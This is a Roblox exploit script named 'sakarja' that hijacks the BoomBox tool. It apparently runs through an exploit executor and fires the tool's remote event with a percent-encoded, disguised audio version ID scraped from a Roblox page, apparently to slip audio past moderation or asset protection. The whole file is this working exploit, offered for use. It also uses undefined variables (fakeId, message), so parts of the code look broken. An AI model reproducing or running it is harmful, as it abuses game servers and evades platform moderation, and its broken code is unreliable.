--[[




                                                                                                                 
                                                                                                                 
                                   kkkkkkkk                                               jjjj                   
                                   k::::::k                                              j::::j                  
                                   k::::::k                                               jjjj                   
                                   k::::::k                                                                      
    ssssssssss     aaaaaaaaaaaaa    k:::::k    kkkkkkkaaaaaaaaaaaaa  rrrrr   rrrrrrrrr  jjjjjjj  aaaaaaaaaaaaa   
  ss::::::::::s    a::::::::::::a   k:::::k   k:::::k a::::::::::::a r::::rrr:::::::::r j:::::j  a::::::::::::a  
ss:::::::::::::s   aaaaaaaaa:::::a  k:::::k  k:::::k  aaaaaaaaa:::::ar:::::::::::::::::r j::::j  aaaaaaaaa:::::a 
s::::::ssss:::::s           a::::a  k:::::k k:::::k            a::::arr::::::rrrrr::::::rj::::j           a::::a 
 s:::::s  ssssss     aaaaaaa:::::a  k::::::k:::::k      aaaaaaa:::::a r:::::r     r:::::rj::::j    aaaaaaa:::::a 
   s::::::s        aa::::::::::::a  k:::::::::::k     aa::::::::::::a r:::::r     rrrrrrrj::::j  aa::::::::::::a 
      s::::::s    a::::aaaa::::::a  k:::::::::::k    a::::aaaa::::::a r:::::r            j::::j a::::aaaa::::::a 
ssssss   s:::::s a::::a    a:::::a  k::::::k:::::k  a::::a    a:::::a r:::::r            j::::ja::::a    a:::::a 
s:::::ssss::::::sa::::a    a:::::a k::::::k k:::::k a::::a    a:::::a r:::::r            j::::ja::::a    a:::::a 
s::::::::::::::s a:::::aaaa::::::a k::::::k  k:::::ka:::::aaaa::::::a r:::::r            j::::ja:::::aaaa::::::a 
 s:::::::::::ss   a::::::::::aa:::ak::::::k   k:::::ka::::::::::aa:::ar:::::r            j::::j a::::::::::aa:::a
  sssssssssss      aaaaaaaaaa  aaaakkkkkkkk    kkkkkkkaaaaaaaaaa  aaaarrrrrrr            j::::j  aaaaaaaaaa  aaaa
                                                                                         j::::j                  
                                                                               jjjj      j::::j                  
                                                                              j::::jj   j:::::j                  
                                                                              j::::::jjj::::::j                  
                                                                               jj::::::::::::j                   
                                                                                 jjj::::::jjj                    
                                                                                    jjjjjj                       











]]
local sVersion = "1.5"


print'credits to aidez'
function encode(Code)
ID = tostring(Code)

function toversionid(id)
    local dab = game:HttpGet("https://www.roblox.com/studio/plugins/info?assetId="..id)
    if string.find(dab, 'value="') then 
	local epic = string.find(dab, 'value="')
	local almost = string.sub(dab, epic + 7, epic + 18)
        local filter1 = string.gsub(almost, " ", "")
        local filter2 = string.gsub(filter1, "/", "")
        local filter3 = string.gsub(filter2, ">", "")
        local filter4 = string.gsub(filter3, '"', "")
        local versionid = string.gsub(filter4, "<", "")
	return versionid
    end
end

function percentencode(id)
    local third = string.gsub(tostring(id), "3", "%%33")
    local first = string.gsub(third, "1", "%%31")
    local second = string.gsub(first, "2", "%%32")
    local fourth = string.gsub(second, "4", "%%34")
    local fifth = string.gsub(fourth, "5", "%%35")
    local sixth = string.gsub(fifth, "6", "%%36")
    local seventh = string.gsub(sixth, "7", "%%37")
    local eighth = string.gsub(seventh, "8", "%%38")
    local ninth = string.gsub(eighth, "9", "%%39")
    local PercentEncodedId = ninth
    return PercentEncodedId
end

function toplayable(id)
local playableid = fakeId.."\n\naudio protected by\nsakarja "..sVersion.." \ncredits to aidez\n\n\n\n::::::::::::::::::::::::::::::::::::::::::::\n"..message.."\n::::::::::::::::::::::::::::::::::::::::::::\n\n\n\n\n%63%72%65%64%69%74%73%20%74%6f%20%61%69%64%65%7a%72%62%78%61%73%73%65%74%69%64%3a%2f%2f%63%72%65%64%69%74%73%20%74%6f%20%61%69%64%65%7a%63%72%65%64%69%74%73%20%74%6f%20%61%69%64%65%7a_&%76%65%72%73%69%6f%6e%69%64="..tostring(id)
return playableid
end

function fullyconvert(id)
    local convert = toversionid(id)
    local encoded = percentencode(convert)
    local playable = toplayable(encoded)
    return playable
end

yesid = string.gsub(tostring(ID), "rbxassetid://", "")
siid = string.gsub(yesid, "http://www.roblox.com/asset/", "")
yupid = string.gsub(siid, "?id=", "")
encrypted = fullyconvert(yupid)

for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
	if v.Name == "BoomBox" then
		v.Remote:FireServer("PlaySong", tostring(encrypted))
		end
	end
end

local Boom = game.Players.LocalPlayer.Backpack.BoomBox
Boom.Equipped:Connect(function(Mouse)
Mouse.Button1Down:Connect(function()
wait(0)
if game.Players.LocalPlayer.PlayerGui:FindFirstChild("ChooseSongGui") then
game.Players.LocalPlayer.PlayerGui:FindFirstChild("ChooseSongGui"):Destroy()
end
local sg = Instance.new("ScreenGui")
sg.Name = "ChooseSongGui"
sg.Parent = game.Players.LocalPlayer.PlayerGui
local frame = Instance.new("Frame")
frame.Style = "RobloxRound"
frame.Size = UDim2.new(0.25, 0, 0.25, 0)
frame.Position = UDim2.new((1-frame.Size.X.Scale)/2, 0, (1-frame.Size.Y.Scale)/2, 0)
frame.Parent = sg
frame.Draggable = true
local text = Instance.new("TextLabel")
text.BackgroundTransparency = 1
text.TextStrokeTransparency = 0
text.TextColor3 = Color3.new(1, 1, 1)
text.Size = UDim2.new(1, 0, 0.6, 0)
text.TextScaled = true
text.Text = "sakarja audio protector\n\n credits to aidez"
text.Parent = frame
local input = Instance.new("TextBox")
input.BackgroundColor3 = Color3.new(0, 0, 0)
input.BackgroundTransparency = 0.5
input.BorderColor3 = Color3.new(1, 1, 1)
input.TextColor3 = Color3.new(1, 1, 1)
input.TextStrokeTransparency = 1
input.TextScaled = true
input.Text = "142376088"
input.Size = UDim2.new(1, 0, 0.2, 0)
input.Position = UDim2.new(0, 0, 0.6, 0)
input.Parent = frame
local button = Instance.new("TextButton")
button.Style = "RobloxButton"
button.Size = UDim2.new(0.75, 0, 0.2, 0)
button.Position = UDim2.new(0.125, 0, 0.8, 0)
button.TextColor3 = Color3.new(1, 1, 1)
button.TextStrokeTransparency = 0
button.Text = "Play!"
button.TextScaled = true
button.Parent = frame
button.MouseButton1Click:connect(function()
sg:Destroy()
for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
	if v.Name == "BoomBox" then
	v.Parent = game.Players.LocalPlayer.Character
	v.Remote:FireServer("PlaySong", "3069324678")
	wait(1.8)
	end
end
encode(input.Text)
end)
end)
end)
print'credits to aidez'
